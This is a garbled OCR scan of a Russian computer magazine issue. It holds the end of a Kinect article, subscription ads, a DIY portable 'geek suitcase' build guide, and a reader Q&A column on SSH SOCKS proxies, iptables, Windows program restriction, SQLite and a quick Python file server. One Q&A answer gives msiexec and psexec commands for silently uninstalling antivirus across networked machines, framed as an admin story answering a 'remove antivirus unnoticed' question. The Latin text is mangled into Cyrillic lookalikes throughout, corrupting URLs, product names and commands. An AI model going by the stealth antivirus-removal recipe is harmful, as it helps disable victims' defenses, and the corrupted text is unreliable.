Однако, эксперименты с кинектом одним кинектом ограничиваются! 
Если к сенсору добавить проектор — то получится система дополнен- 
ной реальности, хочешь подсвечивай отдельные объекты в комнате, 
рисуй светом на стенах или создай систему, которая бы интеллекту- 
ально гоняла кота за световым пятнышком. Один кинектдает карту 
глубин с одной стороны, а если их взять 3 или 4 и расставить по углам, 
то можно получить полную трехмерную картину внутреннего про- 
странства. Настоящий Зб-сканер, работающий в реальном времени! 

Но не все только людям! 

Еще Кіпесі придется по вкусу и роботам — еще бы, раньше трех- 
мерные лазерные дальномеры стоили несколько тысяч долларов, 
а это устройство реализует те же возможности всего за две сотни. 
Таким образом, можно собрать мощного робота на недорогих 
серийных компонентах. Например: і РоЬоі Сгеаіе в качестве шасси, 
обычный нетбук с установленной ІІЬипІи и Р05 — в роли мозга 
системы, а Кіпесі — в качестве датчиков. Именно так и выглядит 
ѴѴіІІоѵѵ Оагаде ТигНеЬоі [ ѵѵіЦоѵѵдагаде.соппЛигиеЬоі: ]. Да похожим 
образом устроен и ВіІіЬоі [ ЬШЬоТсот ]. к которому прикреплена 
еще и миловидная красная клешня. Плюс уже доступен для заказа 
за $1200. Вообще кинект — первый представитель нового класса 
устройств. Уже готов и его конкурент, изначально нацеленный на 
работу с РС, — Азиз ѴѴАѴІ Хбоп. Вероятно, пройдет еще немного 
времени, и к этой гонке подключатся новые производители, библи- 
отеки обзаведутся обертками для множества языков, и готовые 
решения войдут в повседневную жизнь, а вид человека, машущего 
руками перед компьютером, станет обычным делом, ц-ц 
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6 номеров 564 руб. 
13 номеров 1105 руб. 




6 номеров 810 руб. 
12 номеров 1470 руб. 



6 номеров 785 руб. 
12 номеров 1420 руб. 



6 номеров 1110 руб. 
12 номеров 2016 руб. 









6 номеров 1 260 руб. 
1 2 номеров 2200 руб. 



6 номеров 1 260 руб. 
12 номеров 2310 руб. 



6 номеров 900 руб. 
12 номеров 1720 руб. 



6 номеров 1300 руб. 
1 2 номеров 2300 руб. 



ПОДПИШИСЬ! 

зНор.дІс.ги 



ВЫГОДА + ГАРАНТИЯ 

Редакционная подписка без посредников - это 
гарантия получения важного для Вас журнала и 
экономия до 40% от розничной цены в киоске 

8 - 800 - 200 - 3-999 




□ІЮ 









6 номеров 1130 руб. 
1 2 номеров 2060 руб. 



6 номеров 890 руб. 
12 номеров 1630 руб. 



6 номеров 630 руб. 
12 номеров 1130 руб. 



6 номеров 765 руб. 
12 номеров 1380 руб. 







6 номеров 960 руб. 
12 номеров 1740 руб. 



6 номеров 1 300 руб. 
1 2 номеров 2300 руб. 



3 номера 630 руб. 

6 номеров 1140 руб. 



6 номеров 1 260 руб. 
1 2 номеров 2200 руб. 




6 номеров 2205 руб. 
1 2 номеров 3890 руб. 



6 номеров 21 50 руб. 
1 2 номеров 3930 руб. 



6 номеров 2178 руб. 
1 2 номеров 3960 руб. 



(дате)іаіиі 

МЕДИА ДЛЯ ЭНТУЗИАСТОВ 
















Сергей Силычов |ро(Экитекау.сот)| 



ЧЕМОДАНЧИК 
ДЛЯ ЗАГОРОДНОГО 
ВЫЖИВАНИЯ 



Собираем летний гик-набор в одном чемоданчике 

о На дворе лето, и друзья заставляют тебя забросить широкие экра- 
ны и выползти из городских квартир поближе к природе. Конечно, 
недружелюбный для гика полудикий мир может принести немало 
сюрпризов. Так что предлагаю не отказываться от благ цивилизации 
и выбираться за город со специальным самодельным чемоданчиком. 



Твой спасительный набор будет состоять из усилителя с колонками, 
некоторого света, универсального зарядника и еще кучки гаджетов. 

Но для всей незамысловатой электронной начинки потребуется 
вместилище. Отличный вариант — старый советский чемоданчик с 
хромированными уголками. Как только обзаведешься таким, можно 
заказывать внутренности! 

Покупки в китайских магазинах 

Заказ в китайских интернет-магазинах — это мой любимый вари- 
ант приобретения разных гаджетов. В них огромный выбор весьма 
самобытных устройств с ярлычками «тасіе іп СЬІпа». От большин- 
ства продавцов на еВау эти магазины выгодно отличаются бес- 
платной доставкой авиапочтой по всему миру, даже для копеечных 
заказов. Но стоит отметить, что после пересечения российской гра- 
ницы, скорость перемещения посылки оставляет желать лучшего, 
и любой заказ доберется до твоего почтового отделения в среднем 



не быстрее чем за месяц. Так что покупай все заранее! 

Самый крупный из этих магазинов — еіеаіехігеппе.сот . в ассортимен- 
те которого — порядка 50 000 товаров. Также есть Ьсаіргісе.сот и 
каісіоппаіп.сопп . Отдельно отмечу Ьиуіпсоіпз.сот . в котором небольшой 
выбор, но всегда самые низкие цены. Работают эти магазины вполне 
слаженно, а в службах поддержки понимают даже весьма коверкан- 
ный английский. Если после всех рассказов доверия к магазинам не 
появилось — не рискуй по-крупному, а купи что-нибудь за пару долла- 
ров [ беаІехІгете.сопп/дТі-ісІеаз І и проверь надежность самостоятель- 
но. Оплата в них принимается только одним способом — при помощи 
системы раураі, к счету в которой можно привязать практически 
любую банковскую карту (кроме Маезіхо и Ѵіза-Еіесіхоп). Регистрация 
на раѵраі.сог проста, единственное — несмотря на русскоязычный 
интерфейс, все поля стоит заполнять на латинице. Подробнее про 
подводные камни оплаты и про выбор банка можно прочитать на 
форуме еЬау-Гогит.ги . Теперь об электронной начинке чемоданчика. 
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Чемодан до и после перерождения 



Звук 

Первое, с чем придется столкнуться на природе — это оглушительное 
пение птиц. Лучше всего бороться с ним при помощи небольшой, но 
бодрой акустической системы! 

На ОеаІЕхІгете есть выбор небольших усилков, питающихся от 12 
вольт. Они рассчитаны на всяческую мототехнику, но если правильно 
организовать питание, то можно применить и в нашем деле. 

Неплохой вариант: беаІехФете.сот/беіаіІБ.бх/Бки.ЗбІ 99 он неболь- 
шой и стоит всего $19. Не пугайся надписи на корпусе «зіеге атр», 
несмотря на нехватку буквы «О», стерео у него полноценное. Хотя 
выходы правого канала подписаны неверно — в красный коннектор 
нужно подключать отрицательный провод, и, наоборот, в черный 
выход — красный провод. 

Потенциометрами на корпусе можно регулировать громкость, высо- 
кие и низкие частоты. Есть в нем и простенький трЗ-плеер, умеющий 
играть изб-флешки или карточки збНс, правда, управляется он только 
с пульта, что, впрочем, поправимо. 

Заглянуть внутрь усилка тоже будет полезно! Электронику ты смо- 
жешь достать, открутив саморезы с обоих торцов и днища корпуса. К 
верхней плате — трЗ-плееру — идет трехжильный белый проводок. 
Среднюю жилу можешь перекусить, это лишняя аналоговая земля, и 
единственное, что она реально здесь делает — создает дополнитель- 
ный контур для наводок, без которого музыка станет чище. Также на 
плате, между слотами 115В и 5й есть не распаянный шестиштырько- 
вый разъем кнопок управления плеером. Выходы, начиная от края 
платы: 

1. не подсоединен; 

2 . земля; 

3. источник СІ5В/50; 

4 . назад (или уменьшение громкости при удерживании); 

5 . играть/пауза; 

6 . вперед (или увеличение громкости при удерживании). 

Можешь подпаять кнопки на основные действия и вынести их на при- 
борную панель чемоданчика. После собирай усилок обратно, только 
не забудь добавить свеженькой термопасты на микросхемы усилителя 
— они находятся на обратной стороне большой платы. 

Чтобы не морочить голову лишней пайкой, да и заполучить экранчик 
и радио — можешь поставить автомагнитолу: беаіехігете.соіті/беіаіі.5. 
бх/зки.27987 . 

К усилителю, конечно же, нужно подключить динамики! Здесь раз- 
думывать особо долго не нужно — автомобильные колонки диаметром 
10 или 13 см будут в самый раз, купить их можно в любом автомага- 
зине за 500-700 рублей, да и на полках гипермаркетов они тоже часто 
встречаются. 



Свет 

Другая проблема загорода — кромешная темнота ночью, поэто- 
му хоть какой-то минимум освещения в походном наборе быть 
должен! Во-первых, нужно подсветить сам чемоданчик, чтобы он 
случайно не потерялся и приманивал к себе взгляды. Для этого 
отлично подойдет электролюминесцентный провод, который обо- 
жают многие моддеры. Эти провода требуют достаточно высокого 
напряжения (в несколько сотен вольт), поэтому для них требуется 
специальный повышающий адаптер. 

Несколько основных цветов с блоками питания от 12 вольт можно 
найти на 5.беа[ехФете.сот/5еагсІ"і/ЕІ_+5ігір . Стоит отметить, что 
адаптеры конкретно этих проводов довольно громко и противно 
пищат (ШИМ их инвертора выходит в звуковой диапазон), так что 
музыку придется включать погромче. В принципе, эти провода 
можно резать и подсоединять в параллель несколько кусочков, 
и например, выложить из них какой-нибудь светящийся узор 
на поверхности чемодана. Вдобавок можно подсветить колонки 
в стиле ВМѴѴ-шных ангельских глаз ( беаІехігете.соіті/р/25513 ). 
Кроме того, если друзья веселые и любят потанцевать, то 
надо добавить и немножко диско-света: вращающийся шарик 
( беаіехіхеппе. сот/ р/43968 ), а лучше зелено-красный лазерный про- 
ектор, рисующий сетки из точек ( юІехІгете.сопп/р/44281 ). работает 
он через 12-вольтовый адаптер, а значит, его также можно подклю- 
чить в нашу систему. 

Видео 

Если прокачивать чемодан по полной, то надо добавить и неболь- 
шой экранчик, чтобы проигрывать видео. Можно поставить медиа- 
проигрыватель, но это неинтересно. Функционала у него будет 
негусто, а стоить будет почти как бюджетная таблетка на андроиде. 
Например, еРаб Ьиѵіпсоіп5.соіті/бе1:аі[5/ераб-7-ІоисЬ-ітііб-по1:еЬоок- 
апбгоіб-изЬ-еп1:Ьете1:-г)45-ргобис1:-1851 .Ыті . Конечно, штуковина 
эта далека от идеала — АРМ-процессор ѴІА ѴТ8505 с частотой в 
450 МИі быстрым никак не назвать, да и сенсорная поверхность 
резистивная, многопальцевые жесты она не распознает. Зато 7” 
экран (с традиционным для этого размера разрешением 800x480) 
вполне яркий и позволит насладиться чем-нибудь из мирового 
кино-наследия. Вложив в обустройство чемоданчика еще сотню 
американских долларов, можно поставить планшет получше. 
Например, 7" Огораб ( беаІехІхеппе.сопп/р/71932 ) — с гигагерцовым 
процессором Согіех А8 и емкостным экраном уже позволит создать 
виртуальный Об -пульт ( тагкеі.апбгоіб.сопп/беІаіІзЗіб^сопп.ЬеаІгопік. 
б]з1:ибіо ) . а благодаря встроенному ОРЗ’у — не потеряться среди 
необъятных просторов нашей родины. 
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Чемоданчик в темноте 

Интернет 

Сидеть без интернета может быть скучно даже вдали от цивилиза- 
ции. К счастью, практически всюду, куда ходят пригородные поезда, 
добрались и вышки операторов сотовой связи. Поэтому ЕйбЕ или 
30-интернет — это твой вариант. В загородных условиях качество 
сигнала может быть далеко не безупречным, поэтому перемещаться, 
испытывая постоянные дисконнекты, будет некомфортно. Лучше рас- 
шарить интернет через ѴѴі-Еі. Для этого потребуется 118В 30-модем 
и подходящий ѴѴі-Еі роутер. Купить 115В 30-модем можно и в Китае, 
но смысла в этом нет, почти все местные операторы тоже продают 
эти же модемы (производства Ниаѵѵеі или 2ТЕ) по приемлемой цене 
в 700-1000 рублей. Роутер для ѴѴі-Еі подойдет любой (с ІІ5В-портом), 
поддерживающий прошивку бб-ѵѵгі ( бб-уѵгСсот ) или работающий 
с 36-модемами из коробки, например, беаІехІгете.сопп/р/59040 . 

В качестве более мобильного варианта пойдет беаіехігете. 
сот/р/51 797 . хотя он может сильно утомить, потому что аккумулятора 
из комплекта хватает лишь минут на 20 работы, а во время зарядки 
работать он не может. Если же ты уже решил потратиться на апбгоіб- 
таблетку от Огораб, то дополнительно роутера не понадобится — у нее 
есть ІІ5В-разъем и должны поддерживаться многие модемы. А начи- 
ная с апбгоіб-версии 2.2, в нем есть встроенный функционал для рас- 
шаривания 36 через ѴѴі-Еі, в более же старых версиях андроида при- 
дется воспользоваться сторонней программкой, например Вагпаісе 
ѴѴіЕі Тебпег ( тагкеЕапбгоіб.сот/беІаіІзЗіб^пеЕзгут.ЬагпасІе ). 



Список материалов чемоданчика 


Деталь 


Цена 


РМ-передатчик 


200 


ІІЗВ-адаптер 


60 


Аккумулятор 


600 


Баллончик с краской 


150 


Зарядник 


1000 


Клей 


60 


Колонки 


500 


Мультихвост для телефона 


90 


Обшивка из кожзаменителя 


70 


Разъемы, проводочки и большая 
красная кнопка 


150 


Светодиодная лампа 


90 


Усилитель 


530 


Фляга 


200 


Чемоданчик 


Бесценно 


Электролюминесцентый провод 


300 


В сумме: 


4000 



Еще немного радиосвязи 

Будет приятно управлять чемоданом с большего расстояния, чем 
позволяет И К- пульт управления усилителем. Для этого можно исполь- 
зовать трЗ-плеер, к которому подключен ^т-трансмиттер, работаю- 
щий от батареек [ беаІехІхеппе.сопп/р/625 ]. а в чемоданчик встроить 
приемник. Можно заказать небольшой приемник, который работает 
еще и как Віиеіообп-гарнитура [ беаіехігете.сопп/р/і 4956 ). тогда 
можно будет проигрывать музыку прямо с телефона. 

Питание 

Наконец, пришло время поговорить об организации питания. Уже 
обговорен целый ворох гаджетов, которые могли бы уместиться в 
чемоданчик и помочь тебе весело провести время на природе, но 
для всех них требуется источник питания. Поскольку даже портатив- 



ный дизельный генератор взять с собой не удастся, рассчитывать 
приходится только на аккумуляторы. Недорогим и весьма прак- 
тичным вариантом станет использование свинцово-кислотного 
аккумулятора. Те что ставят в автомобили или мотоциклы, обладают 
хорошей емкостью — от 35 А/ч, но подойдут только в случае чемо- 
дана на колесиках. Разумней взять менее тяжелый аккум от ИБП, 
их ты найдешь во многих компьютерных магазинах, а емкости в 
7-12 А/ч должно хватить, чтобы поддерживать движуху в течение 
целой ночи. А когда к утру он разрядится, то просто выставь его на 
яркий дневной свет, и солнечная батарея [ беаіехігете.сот/р/ 71635 ) 
поможет ему вновь поднабраться сил. Правда, даже при хорошей 
погоде, на полную зарядку уйдет 3-4 дня. Для зарядки дома лучше 
выбрать другой вариант: существует замечательный универсальный 
зарядник ( беаіехігете.сопп/р/ 35190 ). который работает с любыми 
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типами аккумуляторов: ІЧіСсІ, N і М Н , І_ІІоп, І_іРо, ЫЕе и, конечно же, со 
свинцово-кислотными. Заряжать он может быстро, с максимальным 
током в 5 ампер, хотя в таком режиме очень сильно греется и он сам, 
и его блок питания, поэтому стоит их охладить, подвесив рядышком 
какой-нибудь кулер. 

От одного 1 2-вольтового аккумулятора придется запитать всю борто- 
вую начинку. Усилителю преобразовывать питание не нужно, необ- 
ходимо лишь подпаять соответствующий штекер. Обычно для 12 В 
используются штырьковые разъемы с внутренним диаметром 2,1 мм 
и внешним — 5,5 мм, внутренний контакт положительный, внешний 
— отрицательный. Также не нужен трансформатор для ЭЛ-провода 
и светодиодной подсветки. Для всего остального нужны преобразо- 
ватели. Удобно встроить в чемодан круглую автомобильную розетку 
прикуривателя, и дальше все адаптеры на разные напряжения 
включать в нее: 

5 В: Без ІІ5В-розетки, от которой привыкли питаться телефоны и 
плееры, тебе точно будет не обойтись. А чтобы не создавать очере- 
дей на зарядку, пускай их будет сразу две ( гіеаІехігете.сот/р/58012 )! 
Удовлетворить электрический голод разномастных мобильных девай- 
сов десятиголовый Змей Горыныч [ сІеаІехігете.сот/р/34674 ). У него 
есть разъемы тісгоІІЭВ, тіпіІІЗВ, покіа, іРЬопе, 5Е, І_Ѳ и т.д. 

1,5-12 В: Многие устройства, рассчитанные на работу от сети 220 
вольт, питаются через адаптеры, на выходе у которых 6-9 вольт. Из 
упомянутого выше, это ѴѴІ-Рі роутер, лазерный проектор и зарядник 
для планшета. Для них есть универсальный адаптер [ беаіехігете. 
сот/ р/90021 ] с набором сменных штекеров. 

12-24 В: Ноутбуки обычно требуют для зарядки большего напряже- 
ния — 19-20 В, но и для них существует блок питания ( сіеаіехігете. 
сот/р/3438 ]. Емкости аккумулятора в чемоданчике должно хватить 
на пару полных зарядок. 

220 В: Если же какой-нибудь капризный гаджет требует исключи- 
тельно переменного тока, то и на него есть управа в виде инвертора 
на 220 вольт. Они бывают разной мощности, но не стоит забывать, 
что емкость и предельный ток аккумулятора не безграничны, поэтому 
нагрузку мощнее 100 ватт точно не стоит подключать, (осаіргісе.сот/ 
ЕВК805/1 00ѴѴ РС 12Ѵ Іо АС 220Ѵ Роѵѵег Іпѵегіег КМ: БіІѵег.ЫтІ . 

Чемодан-минимум 

Вдоволь теоретического экскурса — простенький чемоданчик в руках 
лучше продвинутого в магазине. Наверняка состояние твоего чемода- 
на далеко от идеала, и требуется его несколько освежить. Поскольку 
старые советские чемоданы уже снискали огромную славу на мысе 
Казантип, то массу подробных инструкций по их восстановлению 
нетрудно найти по запросу «Желтый чемодан изготовление». В двух 
словах процесс реабилитации побитой жизнью коробки прост: 

1. Выкрутить все шурупы, вытащить все гвозди и заклепки, отодрать 
всю обшивку. 

2. Картонное основание выровнять эпоксидкой или термоклеем из 
пистолета. 

3. Покрасить или обтянуть основание. 



Плата трЗ из усилителя 



Схема питания 



4. Отполировать или покрасить уголки. 

5. Собрать все обратно. 

Размер чемодана выбирай исключительно исходя из своих сил, 
крайне необходимых предметов найдется даже для самого боль- 
шого, но чтобы таскать его за собой потребуется недюжинная 
выдержка. Теперь чемодан подготовлен, и осталось определиться 
с набором гаджетов для волшебной коробочки. 

Этот бело-красный чемоданчик довольно небольшой, поэтому и 
задач на него возлагается минимум — играть музыку, светиться в 
темноте и заряжать телефончики. На большее там места не най- 
дется (кроме небольшой фляжки для минеральной воды). 
Электрика простая — пара крокодильчиков от аккумулятора ведут 
к двум большим красным кнопкам, одна из которых включает 
все внутреннее оборудование (у усилка и света есть еще и свои 
выключатели), а другая — внешнюю розетку. Подключаться к 
аккуму именно крокодильчиками удобно потому, что это позволит 
легко перекинуть питание на другой источник. 

Для фиксации гаджетов внутри чемодана я использовал клей из 
термоклеевого пистолета, который можно купить за пару сотен 
рублей (плюс десяток стержней за 50 рублей). Усилитель и акку- 
мулятор укреплены на деревянные рейки, которые держатся на 
корпусе чемодана также при помощи термоклея. 

Этот красный чемоданчик — лишь минимальный набор того, что 
стоит брать с собой на природу. Большинство девайсов пригодят- 
ся тебе не только за городом, но и в любой другой день в машине 
и дома, так что потраченные деньги не будут выброшены. Уверен, 
ты придумаешь еще тысячу вариантов дополнить этот комплект, 
главное, выезжая на отдых, не забудь расслабиться и на самом 
деле хорошенько отдохнуть! т 
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Степан «Біер» Ильин НѵѵШег.сот/зІераЫ 




Есть вопросы — присылай 
на Іад@геаІ.хакер.ги 



О: Какой инструмент ты можешь посо- 
ветовать, чтобы найти на сайте мед- 
ленные страницы, чтобы впоследствии 
оптимизировать их? 

А: Наверное, каждый веб-мастер знает о 
таком инструменте для аналитики, какбоодіе 
Апаіуіісз ( \ллмл/. доодіе. сот/а па Місб ). С не- 
давнего времени сервис обзавелся новым 
интерфейсом (он постепенно становится 
доступным всем пользователям) и некоторы- 
ми новыми фичами. Одна из нихзанимается 
какразтем, что измеряетвремя загрузки 
отдельных страниц сайта. По умолчанию, 
правда, такая возможность отключена. Чтобы 
включить бен марк необходимо добавить 
одну строчку в скрипт ОА (тот 35- код, который 
вставляется в каждую страницу веб-проекта 
и необходим для сбора и отправки данных 
Ѳоодіе’у), а именно обращения кфункции 
_1хаскРадеІ_оасІТіте(), который должен про- 
исходить после вызова _ІгаскРадеѵіеѵѵ(): 

// Вариант для асинхронного кода 6А: 
_§ад.ри5Іі([ ^ТгаскРа^еѵіем' ]); 

_%щ . ризМ ( [ '_ТгаскРа§еІ_оасІТіте 1 ] ) ; 

// Вариант для стандартного кода СА: 
ра§еТ гаскеп ._ТгаскРа§еѵіеѵ\/( ) ; 
ра§еТгаскег ._ТгаскРа§еІ_оасІТіте() ; 

После этого данные о времени загрузки 
страницы ты сможешь найти в отчете «Со- 
держание -> Скорость загрузки сайта». В отчет 
будут включены все страницы ресурса, отсо- 
ртированные в списке по времени загрузки в 
секундах. 



О: Каким образом можно сделать пол- 
ный бэкап профайла отдельного поль- 
зователя ѴУ/іпсІоѵѵ$ и всех пользователей 
сразу? Чтобы без проблем перенести 
профиль в другую систему? 

А: Можно было бы объяснить, как это сделать 
вручную, но лучше всего с задачей справятся 
специализированныеутилиты вроде Васкир 
Шііііу ( собе.доод[е.сот/р/Ьаскир-иб[і1:ѵ-4 ) и 
ОаІабгаЬ ( зіІез.доодІе.сот/а/оЬхсотрдиу. 
сотЛооІізб-іі/ѵЬб-ргоіесІз/сІаІадгаЬ І. ко- 
торые полностью автоматизируют процесс. 
Вторая из утилит создает резервную копию 
выбранного профиля (при желании можно 
сделать бэкап всех профайлов сразу), а также 
любых других выбранных папок и оформля- 
ет резервную копию в виде исполняемого 
файла. Соответственно, для переноса профи- 
лей в другую систему, в том числе недавно 
установленную, необходимо лишь запустить 
этотехе-шник. 

О: Некоторые компании для регистра- 
ции по старинке требуют отправить 
факсом какие-то документы. К счастью, 
смог сделать это из офиса, правда, при- 
шлось отключать на телефоне выход на 
международную связь. Как бы обойтись 
без этого геморроя? 

А: Знакомая проблема. Ведь даже для полу- 
чения аккаунта разработчика Арріе, придется 
воспользоваться факсом (ѴѴТР?!). Проще 
всего «отправить бумажку» через специ- 
альный сервис вроде ѵѵѵѵѵѵ. плугах .сот Л гее . 
Совершенно бесплатно, замечу. 



О: Посоветуй 50СК55-прокси, который 
можно установить на удаленном Ипих- 
шелле. 

А: Ты, возможно, удивишься, но в большин- 
стве случаев поднять на Ыпих-хосте соке 
можно всего одной командой: 

55Іі -И -й 0.0.0.0:1080 ІосаІІіозТ 

Таким образом, мы включаем динамическую 
переадресацию портов (флаг«-й») с 1 080 пор- 
та и взаимодействие с клиентами по протоко- 
лам 50СК54 и 50СК55 (то естьточнотакже, 
каки любой другой 50СК55-П рокси). Опция 
«-І\І»указывает, что процессу необходимо ра- 
ботать в ісНе-режиме без запуска каких-либо 
командна ІосаІЬозРе. Можно также запустить 
ббЬ в фоновом режиме, добавив при запуске 
ключ «Л». Важно, что для выполнения коман- 
ды тебе не нужны рутовые привилегии. Но 
они понадобятся, если ты захочешь сделать 
контроль доступа при помощи ірІаЫез: 

ірТаЬІез -А ІИРІІТ --зге 1.2. 3.4 -р Тер 
- -сІрогТ 1080 -] АССЕРТ 
ірТаЬІев -А ІИРІІТ -р Тер --фогТ 1080 -] 
КЕЗЕСТ 

С помощью этих команд мы разрешаем под- 
ключения с ІР-шника 1 .2.3.4 и запрещаем 
любые другие (для 1 080 порта). Но если очень 
хочется отсечьлевые подключения, которые 
обязательно будут, а рутовых прав нет, то 
можно воспользоваться довольной простой 
ргоху-оберткой, написанной на Регі’е, — ТОР 
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Устанавливаем политику для запу- 
ска приложения 

ргоху ( дііЬиЬ.сот/ркгитіпз/регИср-ргоху ). В 

сценарии явным образом прописывается спи- 
сокдопустимыхдля подключения ІР-адресов 
(переменная 0а11оѵѵеб_ір5). ТОР ргоху будет 
стартовать на указанном порту и переадресо- 
выватьна наш 50СК5-сервертолько те запро- 
сы, которые разрешены. Сам демон 55Н при 
этом нужно запустить немного по-другому: 

55Іі -М -0 55555 ІосаІІіОБІ: 

При такой конфигурации никто не сможет под- 
ключиться к50СК5 извне, кроме приложений, 
запущенных на ІосаІЬозБе. 

О: Подскажи, как правильно (без 
лишних костылей и софта) огра- 
ничить список программ, кото- 
рые может запускать ѴУ/іпсІоѵѵ$- 
пользователь? 

А: Задача «на ура» решается с помощью 
стандартного механизма ѴѴіпсІоѵѵз, который 
называется «Политика ограниченного ис- 
пользования программ» (5РР). Если быть 
точным, то через редактор групповой политики 
(ѲРО). Наша задача — запретить пользователю 
запусклюбых приложений, кроме нескольких 
разрешенных (ты их определяешь сам) и тех, 
которые необходимы ему для выполнения 
входа в систему. Так, чтобы юзер мог просто 
залогиниться в систему, ему обязательно нужно 
предоставить доступ кследующим системным 
приложениям: 

С : \1лІіпсІоіл/5\ехр1огег . ехе 
С : \ІлІіпсІоы5\5у5І:ет32\с5Г55 . ехе 
С : \ІлІіпсІоы5\5у5І:ет32\сІыт . ехе 
С : \1лІіпсІоы5\5у5І:ет32\гсІс1ір . ехе 
С : \1лІіпсІоы5\5у5І:ет32\1:а5кІіо5І: . ехе 
С : \1лІіпсІоы5\5у5І;ет32\Т5ТІіете . ехе 
С : \1лІіпсІоы5\5у5І;ет32\и5егіпі1: . ехе 

Это обязательный список — без этих при- 
ложений пользователь даже не сможетзайти 
в систему. Теперь пошагово пройдем по про- 
цессу создания нужной ПОЛИТИКИ: 




БСИНеБру — наиболее продвинутый 
инструмент для работы с БСНііе 

1. Запускаем консоль управления («Пуск-> 
Выполнить» -> ттс). 

2 . Выбираем в меню«Файл Добавить или 
удалить оснастку». 

3. Кликаем на «Редактор объектов групповой 
политики» (6Р0). 

4 . Жмем «Добавить». 

5 . Кликаем «Обзор», указываем пользователя, 
который будет добавлен в 6Р0. 

6. Кликаем «Готово» и потом «ОК». Теперь 
в консоли управления ты видишь дерево с 
корневым элементом «Политика <имя поль- 
зователя». 

7 . Переходим в «Конфигурация пользовате- 
ля Конфигурация ѴѴіпсІоѵѵз -> Параметры 
безопасности» и кликаем правой кнопкой 
по «Политики ограниченного использо- 
вания программ» и выбираем «Создать 
политику ограниченного использования 
программ». 

8. В дереве появятся два новых элемента. 
Кликаем на «Уровни безопасности». 

9 . Дважды кликаем по элементу «Запрещено» 
и устанавливаем этотуровень безопасности 
поумолчанию. С этого момента пользователь 
не сможетзапускать никакие приложения, 
кроме разрешенных. 

10. Переходим в раздел «Дополнительные 
правила». Удаляем отсюда мусор, который 
создала система (элементы, начинающиеся с 
« % Н К ЕѴ_І_0 С АІ__М АС Н I N Е\. . . »] . 

1 1. Остается добавить правила, разрешающие 
запуск необходимых для пользователя прило- 
жений и тех элементов, которые я перечислил 
выше, и необходимые для нормальной работы 
юзера в системе. 

Делается это отдельно для каждого бинарника 
через контекстное меню «Создать правило 
для хэша», где надо выбрать нужный испол- 
няемый файл и поменятьуровень безопасно- 
сти для него на «Неограниченный». 

О: Какую базу данных посоветуешь для 
простых проектов? 

А: Если нужно что-то очень простое, то мой 
совет — ЗОЫіе ( ѵѵѵѵѵѵ.здіііе.огд ). которая 
при всей простоте использования является 
частью многих серьезных проектов. 

Многие программы поддерживают ЗОЫіе в 
качестве формата хранения данных (особенно 
в МасОЗи іРЬопе 05, АпбгоісІ). 

Базой данных ЗОЫіе удобно управлять 
через консольную утилиту здІіІеЗ или 




Дампим адресное пространство 
процесса с помощью РМР 



6111-приложение вроде ЗОШіе Вгоѵѵзег 
[ здІііеЬгоуѵзег.зоигсеіогде.пеі ), ЗОЫіеЗру 
( ѵѵѵѵѵѵ.ѵипда.бе/беІрЫ/боки.рбр/ргобисІз/ 
здіііезру/іпсіех ) и ЗОЫіе Мападег Ыбопз. 
тогіиа.огд/ги/ГгеЬх/аббоп/здІІІе-тападег ). 
Чтобы глубже вникнуть в процессы, происхо- 
дящие внутри ЗОЫіе, рекомендую посмотреть 
видеолекции от ее создателя Ричарда Хиппа 
( Ьіиу/тСОІхА ). 

О: Какой самый простой способ захо- 
стить файлы с удаленной машины? 

А: Недавно открыл для себя один замечатель- 
ный хак, представляющий собой всего одну 
команду: 

$ руІФоп -т 5ітр1еНТТР5егѵег 

Эта команда поднимает на 8000 порту (по 
умолчанию) полноценный веб-сервер с 
контентом текущей директории (т.е.той, от- 
куда она была выполнена). Демон стартует 
на всех интерфейсах одновременно (адрес 
0.0. 0.0). Если в папке будетіпсІех.Ыпл.тоон 
соответствующим образом будет обработан 
при обращении. Если же его не окажется, то 
ты увидишь листингтекущей директории. 
Оченьудобно. Все это хозяйство работает 
потому, что в стандартной поставке РуОооп 
есть модуль ЗітрІеНТТРЗегѵег. А поскольку 
РуОооп сейчас есть в поставке большин- 
ства Ыпих-дистрибутивов, то хак с большой 
вероятностью заработает практически везде. 
Ничего не мешает провернуть то же самое и 
под виндой, если в ней установлен пайтон. 

О: Как незаметно удалить антивирус с 
удаленной машины? 

А: Хочу рассказать об одном довольно за- 
бавном способе, в который я долго не мог 
поверить, когда мне его показали. Его мне 
продемонстрировал один знакомый адми- 
нистратор, которому необходимо было сразу 
со всех машин в локальной сети удалить 
корпоративную версию Зутапіес Апііѵігиз. 
Поскольку речь шла о л о калке крупного 
инвестиционного банка, то об остановке 
работы пользователей не могло идти и речи 
(а трудятся парни и днем, и ночью). Важно 
было удалить антивирус (чтобы установить 
более новый продукт от той же компании), 
но та к, чтобы никто из пользователей даже 
не заметил осуществляемых действий. 
Причем обязательно было обойтись без 
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перезагрузки. Как сделать это на 300 
компьютерах одновременно? Недолго 
думая, приятель посмотрел, как антивирус 
предлагаетудалить его вручную. Для этого 
в ветке реестра НКЕѴ_ІОСАІ__МАСНІІ\ІЕ\ 
50РТМАКЕ\МІСК050РТ\МІІ\Ю0ІлІ5\СІЖКЕІ\ІТ 
ѴЕК5ІОІ\І\ІШІ\І5ТАІ_І_ он нашел запись, 
которая касалась Эутапіес Апііѵігиз. Его 
идентификатор был {ВА4В71 01 -898Е- 
4306-АЕ87-8ВА7А596Е0ЕО}. В параметре 
ІІпіпзІаІІЗіхіпд явно указывалось, что 
деинсталляция осуществляется через 
стандартную службу МзіЕхес.ехе. Уже просто 
скопировав значение этого параметра в 
командную строку, можно было запустить 
процессудаления программы с компьютера. 
Но нам -то нужно «тихое» удаление. Оказа- 
лось, что если добавить несколько ключей 
МзіЕхес.ехе, то провести операцию можно 
вообще без всякого шума: 

МзіЕхес.ехе /погезіагі: /д/х{ВА4В7Ю1- 

898Е-43Ѳ6-АЕ87-8ВА7А596Р0ЕО} 

КЕМОѴЕ=АІ_І_ 

Аимея права администратора домена, та же 
самая команда легко отдается на выполнение 
всем компьютерам в локальной сети: 

рзехес \\сотри1:ег_пате МзіЕхес.ехе / 

погезіагі /д/х{ВА4В7Ю1-898Е-4306- 

АЕ87-8ВА7А596Р0ЕО} КЕМОѴЕ=АІ_І_ 

Зная, сколько сил антивирусные вендоры 
тратят на различные защитные механизмы, 
сложно поверить, что все может быть выпол- 
нено настолько просто. 

О: Как прокачать свой аккаунт на 
РгорЬох, используя реферальную 
систему? Одних только левых етаіі'ов 
не хватает: программа каким-то 
образом определяет уникальность 
системы. 

А: Если говорить начистоту, то мой тебе совет. 
Если тебе действительно нужны дополни- 
тельные гигабайты для РгорЬох-ящикадо не 
обломайся: купи премиальный аккаунт. За 
счет этого сервис может позволить миллионам 
пользователей пользоваться его услугами 
совершенно бесплатно. Но если по сути во- 
